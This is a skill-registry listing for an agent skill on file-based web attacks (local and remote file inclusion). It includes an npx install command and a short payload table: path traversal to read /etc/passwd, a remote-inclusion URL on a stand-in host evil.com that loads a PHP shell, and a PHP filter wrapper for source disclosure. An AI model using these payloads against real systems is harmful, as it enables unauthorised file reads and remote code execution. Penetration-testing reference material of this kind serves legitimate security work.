# File Attacks

> Skills for file-based web attacks including local and remote file inclusion. Use when this capability is needed.

- Skill: `tomevault-io/file-attacks` (Agent Skill, multi-file: 2 files)
- Install (CLI): `npx skillmds@latest add tomevault-io/file-attacks`
- Raw SKILL.md: https://api.skillmd.com/api/skills/tomevault-io/file-attacks/raw
- Safety review: pending
- Works with: Claude Code, Claude.ai, OpenAI Codex
- Category: Coding & Dev Tools
- Author: tomevault-io (https://skillmd.com/u/tomevault-io)
- Updated: 2026-09-17
- Page: https://skillmd.com/skills/tomevault-io/file-attacks

---


# File-Based Attacks

Exploiting file handling vulnerabilities in web applications.

## Skills

- [File Inclusion](references/file-inclusion.md) - LFI/RFI exploitation

## Quick Reference

| Type | Payload | Impact |
|------|---------|--------|
| LFI | `../../../etc/passwd` | File read |
| RFI | `http://evil.com/shell.php` | RCE |
| PHP Wrapper | `php://filter/convert.base64-encode` | Source disclosure |

---
> Converted and distributed by [TomeVault](https://tomevault.io/claim/omkar-ukirde) — claim your Tome and manage your conversions.
<!-- tomevault:4.0:skill_md:2026-04-14 -->

